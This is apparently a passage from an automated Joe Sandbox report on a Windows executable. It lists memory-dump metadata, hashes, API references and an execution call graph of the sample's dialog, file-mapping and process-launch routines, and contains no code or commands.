                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                          • Instruction ID: 5a9d52a1ddb8b7d826f768c0cbdc5ee5ce594922ab5f2837db7c7bbb8e979b24
                          • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                          • Instruction Fuzzy Hash: 3B112B32619B8182EB609F15F84026AB7A5FB98BA4F584231DF8D07758EF3CD56AC700
                          APIs
                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF71612E95F,?,?,?,00007FF71612463A,?,?,?), ref: 00007FF71612EA63
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF71612E95F,?,?,?,00007FF71612463A,?,?,?), ref: 00007FF71612EA6E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ErrorLastObjectSingleWait
                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                          • API String ID: 1211598281-2248577382
                          • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                          • Instruction ID: acaebfe836350885a4c284ddc690890cd86160fbf2c645094928bc2f9007e35d
                          • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                          • Instruction Fuzzy Hash: 90E01AA9E19D4281F640B735BC8247AA2217F66770FD00331D43E811F59F2CA94DE321
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: FindHandleModuleResource
                          • String ID: RTL
                          • API String ID: 3537982541-834975271
                          • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                          • Instruction ID: ff6da575a0aae6efd4fc4ddac0d23eed9951d5e0d3ce1ab4e013983c91b089ac
                          • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                          • Instruction Fuzzy Hash: 34D05E91F09A4286FF196B7ABC8933692715F1AF61FC94439CC1E06398EE2CD18CD761

                          Execution Graph

                          Execution Coverage:11.7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:31
                          execution_graph 25988 7ff64d34b190 26331 7ff64d32255c 25988->26331 25990 7ff64d34b1db 25991 7ff64d34be93 25990->25991 25992 7ff64d34b1ef 25990->25992 26142 7ff64d34b20c 25990->26142 26616 7ff64d34f390 25991->26616 25996 7ff64d34b2db 25992->25996 25997 7ff64d34b1ff 25992->25997 25992->26142 26001 7ff64d34b391 25996->26001 26007 7ff64d34b2f5 25996->26007 25999 7ff64d34b207 25997->25999 26000 7ff64d34b2a9 25997->26000 26010 7ff64d33aae0 48 API calls 25999->26010 25999->26142 26006 7ff64d34b2cb EndDialog 26000->26006 26000->26142 26339 7ff64d3222bc GetDlgItem 26001->26339 26002 7ff64d34beba IsDlgButtonChecked 26003 7ff64d34bec9 26002->26003 26004 7ff64d34bed5 SendDlgItemMessageW 26003->26004 26005 7ff64d34bef0 GetDlgItem IsDlgButtonChecked 26003->26005 26004->26005 26635 7ff64d3362dc GetCurrentDirectoryW 26005->26635 26006->26142 26011 7ff64d33aae0 48 API calls 26007->26011 26014 7ff64d34b236 26010->26014 26015 7ff64d34b313 SetDlgItemTextW 26011->26015 26013 7ff64d34bf47 GetDlgItem 26645 7ff64d322520 26013->26645 26649 7ff64d321ec4 34 API calls _handle_error 26014->26649 26020 7ff64d34b326 26015->26020 26018 7ff64d34b408 GetDlgItem 26024 7ff64d34b422 IsDlgButtonChecked IsDlgButtonChecked 26018->26024 26025 7ff64d34b44f SetFocus 26018->26025 26019 7ff64d34b3f5 26038 7ff64d34bcc5 26019->26038 26158 7ff64d34b3b1 EndDialog 26019->26158 26029 7ff64d34b340 GetMessageW 26020->26029 26020->26142 26023 7ff64d34b246 26028 7ff64d34b25c 26023->26028 26650 7ff64d32250c 26023->26650 26024->26025 26030 7ff64d34b4f2 26025->26030 26031 7ff64d34b465 26025->26031 26026 7ff64d34b3da 26032 7ff64d321fa0 31 API calls 26026->26032 26047 7ff64d34c363 26028->26047 26028->26142 26036 7ff64d34b35e IsDialogMessageW 26029->26036 26029->26142 26353 7ff64d328d04 26030->26353 26037 7ff64d33aae0 48 API calls 26031->26037 26032->26142 26036->26020 26041 7ff64d34b373 TranslateMessage DispatchMessageW 26036->26041 26042 7ff64d34b46f 26037->26042 26043 7ff64d33aae0 48 API calls 26038->26043 26040 7ff64d34b52c 26363 7ff64d34ef80 26040->26363 26041->26020 26653 7ff64d32129c 26042->26653 26044 7ff64d34bcd6 SetDlgItemTextW 26043->26044 26048 7ff64d33aae0 48 API calls 26044->26048 26710 7ff64d357904 26047->26710 26053 7ff64d34bd08 26048->26053 26070 7ff64d32129c 33 API calls 26053->26070 26054 7ff64d34c368 26064 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26054->26064 26058 7ff64d34b498 26062 7ff64d34f0a4 24 API calls 26058->26062 26069 7ff64d34b4a5 26062->26069 26072 7ff64d34c36e 26064->26072 26069->26054 26085 7ff64d34b4e8 26069->26085 26101 7ff64d34bd31 26070->26101 26082 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26072->26082 26080 7ff64d34bdda 26086 7ff64d33aae0 48 API calls 26080->26086 26087 7ff64d34c374 26082->26087 26094 7ff64d34b5ec 26085->26094 26663 7ff64d34fa80 33 API calls 2 library calls 26085->26663 26096 7ff64d34bde4 26086->26096 26107 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26087->26107 26091 7ff64d321fa0 31 API calls 26099 7ff64d34b586 26091->26099 26104 7ff64d34b61a 26094->26104 26664 7ff64d3332a8 26094->26664 26118 7ff64d32129c 33 API calls 26096->26118 26099->26072 26099->26085 26101->26080 26113 7ff64d32129c 33 API calls 26101->26113 26401 7ff64d332f58 26104->26401 26112 7ff64d34c37a 26107->26112 26124 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26112->26124 26119 7ff64d34bd7f 26113->26119 26116 7ff64d34b64c 26413 7ff64d337fc4 26116->26413 26117 7ff64d34b634 GetLastError 26117->26116 26123 7ff64d34be0d 26118->26123 26126 7ff64d33aae0 48 API calls 26119->26126 26122 7ff64d34b60e 26667 7ff64d349d90 12 API calls _handle_error 26122->26667 26140 7ff64d32129c 33 API calls 26123->26140 26130 7ff64d34c380 26124->26130 26131 7ff64d34bd8a 26126->26131 26141 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26130->26141 26135 7ff64d321150 33 API calls 26131->26135 26133 7ff64d34b65e 26138 7ff64d34b674 26133->26138 26139 7ff64d34b665 GetLastError 26133->26139 26136 7ff64d34bda2 26135->26136 26697 7ff64d322034 26136->26697 26143 7ff64d34b71c 26138->26143 26147 7ff64d34b72b 26138->26147 26149 7ff64d34b68b GetTickCount 26138->26149 26139->26138 26144 7ff64d34be4e 26140->26144 26145 7ff64d34c386 26141->26145 26701 7ff64d352320 26142->26701 26143->26147 26166 7ff64d34bb79 26143->26166 26160 7ff64d321fa0 31 API calls 26144->26160 26150 7ff64d32255c 61 API calls 26145->26150 26151 7ff64d34ba50 26147->26151 26668 7ff64d336454 26147->26668 26416 7ff64d324228 26149->26416 26154 7ff64d34c3e4 26150->26154 26151->26158 26692 7ff64d32bd0c 33 API calls 26151->26692 26152 7ff64d34bdbe 26156 7ff64d321fa0 31 API calls 26152->26156 26161 7ff64d34c3e8 26154->26161 26169 7ff64d34c489 GetDlgItem SetFocus 26154->26169 26214 7ff64d34c3fd 26154->26214 26164 7ff64d34bdcc 26156->26164 26158->26026 26168 7ff64d34be78 26160->26168 26178 7ff64d352320 _handle_error 8 API calls 26161->26178 26163 7ff64d34b74e 26680 7ff64d33b914 102 API calls 26163->26680 26173 7ff64d321fa0 31 API calls 26164->26173 26181 7ff64d33aae0 48 API calls 26166->26181 26167 7ff64d34ba75 26693 7ff64d321150 26167->26693 26177 7ff64d321fa0 31 API calls 26168->26177 26174 7ff64d34c4ba 26169->26174 26173->26080 26187 7ff64d32129c 33 API calls 26174->26187 26175 7ff64d34b6ba 26426 7ff64d321fa0 26175->26426 26183 7ff64d34be83 26177->26183 26184 7ff64d34ca97 26178->26184 26179 7ff64d34b768 26186 7ff64d33da98 48 API calls 26179->26186 26189 7ff64d34bba7 SetDlgItemTextW 26181->26189 26182 7ff64d34ba8a 26190 7ff64d33aae0 48 API calls 26182->26190 26191 7ff64d321fa0 31 API calls 26183->26191 26185 7ff64d34c434 SendDlgItemMessageW 26192 7ff64d34c45d EndDialog 26185->26192 26193 7ff64d34c454 26185->26193 26194 7ff64d34b7aa GetCommandLineW 26186->26194 26195 7ff64d34c4cc 26187->26195 26188 7ff64d34b6c8 26431 7ff64d332134 26188->26431 26196 7ff64d322534 26189->26196 26197 7ff64d34ba97 26190->26197 26191->26026 26192->26161 26193->26192 26198 7ff64d34b869 26194->26198 26199 7ff64d34b84f 26194->26199 26715 7ff64d3380d8 33 API calls 26195->26715 26201 7ff64d34bbc5 SetDlgItemTextW GetDlgItem 26196->26201 26202 7ff64d321150 33 API calls 26197->26202 26685 7ff64d34ab54 33 API calls _handle_error 26198->26685 26681 7ff64d3220b0 26199->26681 26206 7ff64d34bc13 26201->26206 26207 7ff64d34bbf0 GetWindowLongPtrW SetWindowLongPtrW 26201->26207 26208 7ff64d34baaa 26202->26208 26203 7ff64d34c4e0 26209 7ff64d32250c SetDlgItemTextW 26203->26209 26451 7ff64d34ce88 26206->26451 26207->26206 26213 7ff64d321fa0 31 API calls 26208->26213 26216 7ff64d34c4f4 26209->26216 26210 7ff64d34b87a 26686 7ff64d34ab54 33 API calls _handle_error 26210->26686 26221 7ff64d34bab5 26213->26221 26214->26161 26214->26185 26228 7ff64d34c526 SendDlgItemMessageW FindFirstFileW 26216->26228 26218 7ff64d34b704 26447 7ff64d33204c 26218->26447 26219 7ff64d34b6f5 GetLastError 26219->26218 26225 7ff64d321fa0 31 API calls 26221->26225 26222 7ff64d34b88b 26687 7ff64d34ab54 33 API calls _handle_error 26222->26687 26224 7ff64d34ce88 160 API calls 26226 7ff64d34bc3c 26224->26226 26227 7ff64d34bac3 26225->26227 26601 7ff64d34f974 26226->26601 26238 7ff64d33aae0 48 API calls 26227->26238 26232 7ff64d34c57b 26228->26232 26325 7ff64d34ca04 26228->26325 26242 7ff64d33aae0 48 API calls 26232->26242 26233 7ff64d34b89c 26688 7ff64d33b9b4 102 API calls 26233->26688 26237 7ff64d34ce88 160 API calls 26253 7ff64d34bc6a 26237->26253 26241 7ff64d34badb 26238->26241 26239 7ff64d34b8b3 26689 7ff64d34fbdc 33 API calls 26239->26689 26240 7ff64d34ca81 26240->26161 26254 7ff64d32129c 33 API calls 26241->26254 26247 7ff64d34c59e 26242->26247 26244 7ff64d34caa9 26245 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26244->26245 26249 7ff64d34caae 26245->26249 26246 7ff64d34bc96 26615 7ff64d322298 GetDlgItem EnableWindow 26246->26615 26258 7ff64d32129c 33 API calls 26247->26258 26248 7ff64d34b8d2 CreateFileMappingW 26251 7ff64d34b953 ShellExecuteExW 26248->26251 26252 7ff64d34b911 MapViewOfFile 26248->26252 26256 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26249->26256 26270 7ff64d34b974 26251->26270 26690 7ff64d353640 26252->26690 26253->26246 26257 7ff64d34ce88 160 API calls 26253->26257 26261 7ff64d34bb04 26254->26261 26260 7ff64d34cab4 26256->26260 26257->26246 26259 7ff64d34c5cd 26258->26259 26262 7ff64d321150 33 API calls 26259->26262 26264 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26260->26264 26261->26112 26265 7ff64d34bb5a 26261->26265 26266 7ff64d34c5e8 26262->26266 26263 7ff64d34b9c3 26271 7ff64d34b9dc UnmapViewOfFile CloseHandle 26263->26271 26272 7ff64d34b9ef 26263->26272 26267 7ff64d34caba 26264->26267 26268 7ff64d321fa0 31 API calls 26265->26268 26716 7ff64d32e164 33 API calls 2 library calls 26266->26716 26276 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26267->26276 26268->26158 26270->26263 26278 7ff64d34b9b1 Sleep 26270->26278 26271->26272 26272->26087 26275 7ff64d34ba25 26272->26275 26273 7ff64d34c5ff 26274 7ff64d321fa0 31 API calls 26273->26274 26277 7ff64d34c60c 26274->26277 26280 7ff64d321fa0 31 API calls 26275->26280 26279 7ff64d34cac0 26276->26279 26277->26249 26282 7ff64d321fa0 31 API calls 26277->26282 26278->26263 26278->26270 26283 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26279->26283 26281 7ff64d34ba42 26280->26281 26284 7ff64d321fa0 31 API calls 26281->26284 26285 7ff64d34c673 26282->26285 26286 7ff64d34cac6 26283->26286 26284->26151 26287 7ff64d32250c SetDlgItemTextW 26285->26287 26289 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26286->26289 26288 7ff64d34c687 FindClose 26287->26288 26290 7ff64d34c797 SendDlgItemMessageW 26288->26290 26291 7ff64d34c6a3 26288->26291 26292 7ff64d34cacc 26289->26292 26294 7ff64d34c7cb 26290->26294 26717 7ff64d34a2cc 10 API calls _handle_error 26291->26717 26296 7ff64d33aae0 48 API calls 26294->26296 26295 7ff64d34c6c6 26297 7ff64d33aae0 48 API calls 26295->26297 26298 7ff64d34c7d8 26296->26298 26299 7ff64d34c6cf 26297->26299 26301 7ff64d32129c 33 API calls 26298->26301 26300 7ff64d33da98 48 API calls 26299->26300 26305 7ff64d34c6ec memcpy_s 26300->26305 26302 7ff64d34c807 26301->26302 26304 7ff64d321150 33 API calls 26302->26304 26303 7ff64d321fa0 31 API calls 26306 7ff64d34c783 26303->26306 26307 7ff64d34c822 26304->26307 26305->26260 26305->26303 26308 7ff64d32250c SetDlgItemTextW 26306->26308 26718 7ff64d32e164 33 API calls 2 library calls 26307->26718 26308->26290 26310 7ff64d34c839 26311 7ff64d321fa0 31 API calls 26310->26311 26312 7ff64d34c845 memcpy_s 26311->26312 26313 7ff64d321fa0 31 API calls 26312->26313 26314 7ff64d34c87f 26313->26314 26315 7ff64d321fa0 31 API calls 26314->26315 26316 7ff64d34c88c 26315->26316 26316->26267 26317 7ff64d321fa0 31 API calls 26316->26317 26318 7ff64d34c8f3 26317->26318 26319 7ff64d32250c SetDlgItemTextW 26318->26319 26320 7ff64d34c907 26319->26320 26320->26325 26719 7ff64d34a2cc 10 API calls _handle_error 26320->26719 26322 7ff64d34c932 26323 7ff64d33aae0 48 API calls 26322->26323 26324 7ff64d34c93c 26323->26324 26326 7ff64d33da98 48 API calls 26324->26326 26325->26161 26325->26240 26325->26244 26325->26286 26328 7ff64d34c959 memcpy_s 26326->26328 26327 7ff64d321fa0 31 API calls 26329 7ff64d34c9f0 26327->26329 26328->26279 26328->26327 26330 7ff64d32250c SetDlgItemTextW 26329->26330 26330->26325 26332 7ff64d32256a 26331->26332 26333 7ff64d3225d0 26331->26333 26332->26333 26720 7ff64d33a4ac 26332->26720 26333->25990 26335 7ff64d32258f 26335->26333 26336 7ff64d3225a4 GetDlgItem 26335->26336 26336->26333 26337 7ff64d3225b7 26336->26337 26337->26333 26338 7ff64d3225be SetDlgItemTextW 26337->26338 26338->26333 26340 7ff64d3222fc 26339->26340 26341 7ff64d322334 26339->26341 26343 7ff64d32129c 33 API calls 26340->26343 26812 7ff64d3223f8 GetWindowTextLengthW 26341->26812 26344 7ff64d32232a memcpy_s 26343->26344 26345 7ff64d321fa0 31 API calls 26344->26345 26348 7ff64d322389 26344->26348 26345->26348 26346 7ff64d3223c8 26347 7ff64d352320 _handle_error 8 API calls 26346->26347 26349 7ff64d3223dd 26347->26349 26348->26346 26350 7ff64d3223f0 26348->26350 26349->26018 26349->26019 26349->26158 26351 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26350->26351 26352 7ff64d3223f5 26351->26352 26354 7ff64d328d34 26353->26354 26361 7ff64d328de8 26353->26361 26357 7ff64d328de3 26354->26357 26358 7ff64d328d42 memcpy_s 26354->26358 26359 7ff64d328d91 26354->26359 26847 7ff64d321f80 33 API calls 3 library calls 26357->26847 26358->26040 26359->26358 26362 7ff64d3521d0 33 API calls 26359->26362 26848 7ff64d322004 33 API calls std::_Xinvalid_argument 26361->26848 26362->26358 26367 7ff64d34efb0 26363->26367 26364 7ff64d34efd7 26365 7ff64d352320 _handle_error 8 API calls 26364->26365 26366 7ff64d34b537 26365->26366 26377 7ff64d33aae0 26366->26377 26367->26364 26849 7ff64d32bd0c 33 API calls 26367->26849 26369 7ff64d34f02a 26370 7ff64d321150 33 API calls 26369->26370 26371 7ff64d34f03f 26370->26371 26372 7ff64d321fa0 31 API calls 26371->26372 26374 7ff64d34f04f memcpy_s 26371->26374 26372->26374 26373 7ff64d321fa0 31 API calls 26375 7ff64d34f076 26373->26375 26374->26373 26376 7ff64d321fa0 31 API calls 26375->26376 26376->26364 26378 7ff64d33aaf3 26377->26378 26850 7ff64d339774 26378->26850 26381 7ff64d33ab58 LoadStringW 26382 7ff64d33ab86 26381->26382 26383 7ff64d33ab71 LoadStringW 26381->26383 26384 7ff64d33da98 26382->26384 26383->26382 26869 7ff64d33d874 26384->26869 26387 7ff64d34f0a4 26903 7ff64d34ae1c PeekMessageW 26387->26903 26390 7ff64d34f143 IsDlgButtonChecked IsDlgButtonChecked 26392 7ff64d34f189 26390->26392 26393 7ff64d34f1a4 IsDlgButtonChecked 26390->26393 26391 7ff64d34f0f5 26394 7ff64d34f101 ShowWindow IsDlgButtonChecked IsDlgButtonChecked 26391->26394 26392->26393 26395 7ff64d34f1c6 IsDlgButtonChecked IsDlgButtonChecked 26393->26395 26396 7ff64d34f1c3 26393->26396 26394->26390 26397 7ff64d34f218 IsDlgButtonChecked 26395->26397 26398 7ff64d34f1f3 IsDlgButtonChecked 26395->26398 26396->26395 26399 7ff64d352320 _handle_error 8 API calls 26397->26399 26398->26397 26400 7ff64d34b578 26399->26400 26400->26091 26402 7ff64d33309d 26401->26402 26409 7ff64d332f8e 26401->26409 26403 7ff64d352320 _handle_error 8 API calls 26402->26403 26404 7ff64d3330b3 26403->26404 26404->26116 26404->26117 26405 7ff64d333077 26405->26402 26406 7ff64d333684 56 API calls 26405->26406 26406->26402 26407 7ff64d32129c 33 API calls 26407->26409 26409->26405 26409->26407 26410 7ff64d3330c8 26409->26410 26908 7ff64d333684 26409->26908 26411 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26410->26411 26412 7ff64d3330cd 26411->26412 26414 7ff64d337fcf 26413->26414 26415 7ff64d337fd2 SetCurrentDirectoryW 26413->26415 26414->26415 26415->26133 26417 7ff64d324255 26416->26417 26418 7ff64d32426a 26417->26418 26419 7ff64d32129c 33 API calls 26417->26419 26420 7ff64d352320 _handle_error 8 API calls 26418->26420 26419->26418 26421 7ff64d3242a1 26420->26421 26422 7ff64d323c84 26421->26422 26423 7ff64d323cab 26422->26423 27041 7ff64d32710c 26423->27041 26425 7ff64d323cbb memcpy_s 26425->26175 26427 7ff64d321fb3 26426->26427 26428 7ff64d321fdc 26426->26428 26427->26428 26429 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26427->26429 26428->26188 26430 7ff64d322000 26429->26430 26434 7ff64d33216a 26431->26434 26432 7ff64d33219e 26435 7ff64d33227f 26432->26435 26437 7ff64d336a0c 49 API calls 26432->26437 26433 7ff64d3321b1 CreateFileW 26433->26432 26434->26432 26434->26433 26436 7ff64d3322af 26435->26436 26440 7ff64d3220b0 33 API calls 26435->26440 26438 7ff64d352320 _handle_error 8 API calls 26436->26438 26439 7ff64d332209 26437->26439 26441 7ff64d3322c4 26438->26441 26442 7ff64d332246 26439->26442 26443 7ff64d33220d CreateFileW 26439->26443 26440->26436 26441->26218 26441->26219 26442->26435 26444 7ff64d3322d8 26442->26444 26443->26442 26445 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26444->26445 26446 7ff64d3322dd 26445->26446 26448 7ff64d332066 26447->26448 26449 7ff64d332072 26447->26449 26448->26449 27053 7ff64d3320d0 26448->27053 27060 7ff64d34aa08 26451->27060 26453 7ff64d34d1ee 26454 7ff64d321fa0 31 API calls 26453->26454 26455 7ff64d34d1f7 26454->26455 26457 7ff64d352320 _handle_error 8 API calls 26455->26457 26456 7ff64d33d22c 33 API calls 26575 7ff64d34cf03 memcpy_s 26456->26575 26458 7ff64d34bc2b 26457->26458 26458->26224 26459 7ff64d34eefa 27193 7ff64d32704c 47 API calls memcpy_s 26459->27193 26462 7ff64d34ef00 27194 7ff64d32704c 47 API calls memcpy_s 26462->27194 26464 7ff64d34ef06 26468 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26464->26468 26466 7ff64d34eeee 26467 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26466->26467 26469 7ff64d34eef4 26467->26469 26471 7ff64d34ef0c 26468->26471 27192 7ff64d32704c 47 API calls memcpy_s 26469->27192 26473 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26471->26473 26475 7ff64d34ef12 26473->26475 26474 7ff64d34ee4a 26476 7ff64d34eed2 26474->26476 26478 7ff64d3220b0 33 API calls 26474->26478 26477 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26475->26477 27190 7ff64d321f80 33 API calls 3 library calls 26476->27190 26484 7ff64d34ef18 26477->26484 26481 7ff64d34ee77 26478->26481 26479 7ff64d34eee8 27191 7ff64d322004 33 API calls std::_Xinvalid_argument 26479->27191 26480 7ff64d3213a4 33 API calls 26482 7ff64d34dc3a GetTempPathW 26480->26482 27189 7ff64d34abe8 33 API calls 3 library calls 26481->27189 26482->26575 26483 7ff64d3362dc 35 API calls 26483->26575 26492 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26484->26492 26489 7ff64d34ee8d 26497 7ff64d321fa0 31 API calls 26489->26497 26501 7ff64d34eea4 memcpy_s 26489->26501 26490 7ff64d322520 SetDlgItemTextW 26490->26575 26494 7ff64d34ef1e 26492->26494 26493 7ff64d35bb8c 43 API calls 26493->26575 26502 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26494->26502 26496 7ff64d34e7f3 26496->26476 26496->26479 26500 7ff64d3521d0 33 API calls 26496->26500 26512 7ff64d34e83b memcpy_s 26496->26512 26497->26501 26498 7ff64d321fa0 31 API calls 26498->26476 26499 7ff64d322034 33 API calls 26499->26575 26500->26512 26501->26498 26505 7ff64d34ef24 26502->26505 26503 7ff64d34aa08 33 API calls 26503->26575 26511 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26505->26511 26506 7ff64d34ef6c 27197 7ff64d322004 33 API calls std::_Xinvalid_argument 26506->27197 26507 7ff64d3220b0 33 API calls 26507->26575 26508 7ff64d321fa0 31 API calls 26508->26474 26509 7ff64d34ef78 27199 7ff64d322004 33 API calls std::_Xinvalid_argument 26509->27199 26510 7ff64d333f30 54 API calls 26510->26575 26515 7ff64d34ef2a 26511->26515 26519 7ff64d3220b0 33 API calls 26512->26519 26564 7ff64d34eb8f 26512->26564 26526 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26515->26526 26516 7ff64d34ef72 27198 7ff64d321f80 33 API calls 3 library calls 26516->27198 26518 7ff64d34ef66 27196 7ff64d321f80 33 API calls 3 library calls 26518->27196 26527 7ff64d34e963 26519->26527 26523 7ff64d34ed40 26523->26509 26523->26516 26541 7ff64d34ed3b memcpy_s 26523->26541 26545 7ff64d3521d0 33 API calls 26523->26545 26525 7ff64d34ec2a 26525->26506 26525->26518 26528 7ff64d34ec72 memcpy_s 26525->26528 26537 7ff64d3521d0 33 API calls 26525->26537 26525->26541 26535 7ff64d34ef30 26526->26535 26536 7ff64d34ef60 26527->26536 26542 7ff64d32129c 33 API calls 26527->26542 27103 7ff64d34f4e0 26528->27103 26530 7ff64d34d5e9 GetDlgItem 26538 7ff64d322520 SetDlgItemTextW 26530->26538 26531 7ff64d33dc2c 33 API calls 26531->26575 26533 7ff64d3499c8 31 API calls 26533->26575 26534 7ff64d333d34 51 API calls 26534->26575 26546 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26535->26546 27195 7ff64d32704c 47 API calls memcpy_s 26536->27195 26537->26528 26544 7ff64d34d608 IsDlgButtonChecked 26538->26544 26541->26508 26543 7ff64d34e9a6 26542->26543 27185 7ff64d33d22c 26543->27185 26544->26575 26545->26541 26548 7ff64d34ef36 26546->26548 26553 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26548->26553 26550 7ff64d335b60 53 API calls 26550->26575 26551 7ff64d322674 31 API calls 26551->26575 26552 7ff64d335aa8 33 API calls 26552->26575 26556 7ff64d34ef3c 26553->26556 26554 7ff64d34d63c IsDlgButtonChecked 26554->26575 26555 7ff64d321fa0 31 API calls 26555->26575 26560 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26556->26560 26565 7ff64d34ef42 26560->26565 26562 7ff64d32129c 33 API calls 26588 7ff64d34e9d1 26562->26588 26563 7ff64d34ef54 26567 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26563->26567 26564->26523 26564->26525 26564->26563 26566 7ff64d34ef5a 26564->26566 26571 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26565->26571 26569 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26566->26569 26567->26566 26569->26536 26570 7ff64d324228 33 API calls 26570->26575 26573 7ff64d34ef48 26571->26573 26572 7ff64d3332a8 51 API calls 26572->26575 26576 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26573->26576 26574 7ff64d335820 33 API calls 26574->26575 26575->26453 26575->26456 26575->26459 26575->26462 